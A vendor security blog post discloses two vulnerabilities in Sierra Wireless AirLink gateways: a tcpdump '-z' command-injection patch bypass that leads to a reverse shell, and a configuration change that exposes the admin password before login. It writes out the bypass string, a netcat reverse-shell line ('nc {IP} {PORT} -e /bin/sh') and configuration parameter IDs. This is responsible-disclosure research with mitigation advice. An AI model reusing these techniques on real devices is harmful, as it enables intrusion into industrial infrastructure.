By OTORIO's Research Team
OTORIO researchers recently uncovered two vulnerabilities that affect multiple models of wireless IIoT devices made by Sierra Wireless, a Semtech company (NASDAQ: SMTC) and leading vendor of critical infrastructure connectivity. OTORIO researchers discovered vulnerabilities that leave the devices at risk for remote code execution exploits. These new vulnerabilities are part of OTORIO’s wireless IIoT attack surface analysis research that security researcher Roni Gavrilov will present at the upcoming S4x23 conference on February 15, 2023, in Miami.
The Sierra Wireless AirLink family of wireless gateways and modems offers customers solutions for various industrial, enterprise, and in-vehicle applications.
Vulnerabilities identified by OTORIO are present in the following AirLink products running the ALEOS operation system:
Sierra Wireless and ICS-CERT (CISA) issued advisories regarding the vulnerabilities.
A user with valid ACEManager credentials and access to the ACEManager interface can manipulate the IP-logging operation to execute arbitrary shell commands on the device.
CVSS v3.1 score: 8.0 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
A vulnerability in the ACEManager web service allows for command injection through improper handling of the “-z” flag (responsible for providing a postrotate-command to tcpdump) in requests made to /cgi-bin/iplogging.cgi.
This vulnerability is based on a bypass for a patch released by Sierra Wireless in April 2019, addressing the CVE-2018-4061 reported by Talos.
The patch for the original vulnerability addressed the “-z” flag of tcpdump command, supported in the web interface of ACEManager.
Filtering logic for unsafe parameter in iplogging.cgi
As you can see in the screenshot above, the regular expression will remove any “-z” flag (representing the postrotate-command), as long as there is a space, tab, form feed, or vertical tab after it, as in "tcpdump -z reboot," which was previously used to exploit the same interface on CVE-2018-4061.
However, this check needs to be revised since it is possible to add the command without any spacing. For example, “-zreboot” easily bypasses the nearly 3-year-old patch for the previously discovered CVE.
Sending the following POST request will successfully reboot the device:
iplogging.cgi POST request rebooting the device
Executing an arbitrary binary on the system shows a problem that should be addressed. But still, without any additional work, this vulnerability may allow only limited command execution on the target machine.
Inspecting the tcpdump source code, it executes -z binary using: `execlp(any_binary, filename)`. In our case, the filename is hardcoded to "/tmp/iplogging.pcap", which limits us to the existing binaries on the machine and doesn’t allow any user-controlled parameters. As a result, it adds another layer of complexity to achieve a remote shell on the machine.
tcpdump execution of the post-rotate command
To bypass this limitation, we found a workaround by inserting crafted data into the "/tmp/iplogging.pcap" file, making the file both a valid PCAP and a valid shell script, along with “sh” as the post-rotation command.
Data can be inserted into the target PCAP file by transmitting it directly to the appropriate interface. However, as other communication on the interface may cause issues, an alternative solution is to use the "/cgi-bin/iplogging_upload.cgi" page.
Here is how it was done:
iplogging_upload.cgi POST request
iplogging.cgi POST request
At this phase, the tcpdump program reads our crafted PCAP file (“/tmp/iplogging_params.tcp”) and writes it to the predefined output file (“/tmp/iplogging.pcap”). Once the first MB of data is reached, it will execute /bin/sh with a single parameter, which is a 1MB file containing the data from our crafted PCAP, now stored in “/tmp/iplogging.pcap.” /bin/sh will evaluate the file line by line, ignoring the PCAP header as "bad lines" and continue to our reverse-shell command, embedded as a separate line: ‘nohup nc {IP} {PORT} -e /bin/sh &’.
Reverse shell on Airlink device
A user with valid ACEManager credentials and access to the ACEManager interface can reconfigure the device to expose the ACEManager credentials on the pre-login status page. This leads to a persistent backdoor to the system and cleartext exposure of the admin password.
CVSS v3.1 score: 4.5 (AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)
The Embedded_Ace_Set_Task.cgi executable allows for the modification of configuration values within the configuration manager. An attacker could exploit this by enabling the “Device Status Screen“ configuration parameter (55052) and adding the password parameter (5003) to the list of parameters displayed on the pre-login page(55053).
Embedded_Ace_Set_Task.cgi POST request
As a result, the password becomes visible on the pre-login page:
Pre-login page with admin password exposed
OTORIO responsibly disclosed these vulnerabilities to Sierra Wireless and CISA. Both organizations’ corresponding advisories can be found here:
Sierra Wireless released updated firmware to address these vulnerabilities. Users are urged to update their devices, restrict access to the web interface, and implement strong credentials. Devices exposed to the WAN are particularly at risk, and immediate action is recommended to mitigate this risk.
We appreciate the professional manner in which Sierra Wireless disclosed the vulnerabilities and the coordination of the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
________________
Concerned about vulnerabilities in your critical infrastructure or industrial manufacturing operational environment? Contact OTORIO's OT security experts for professional help.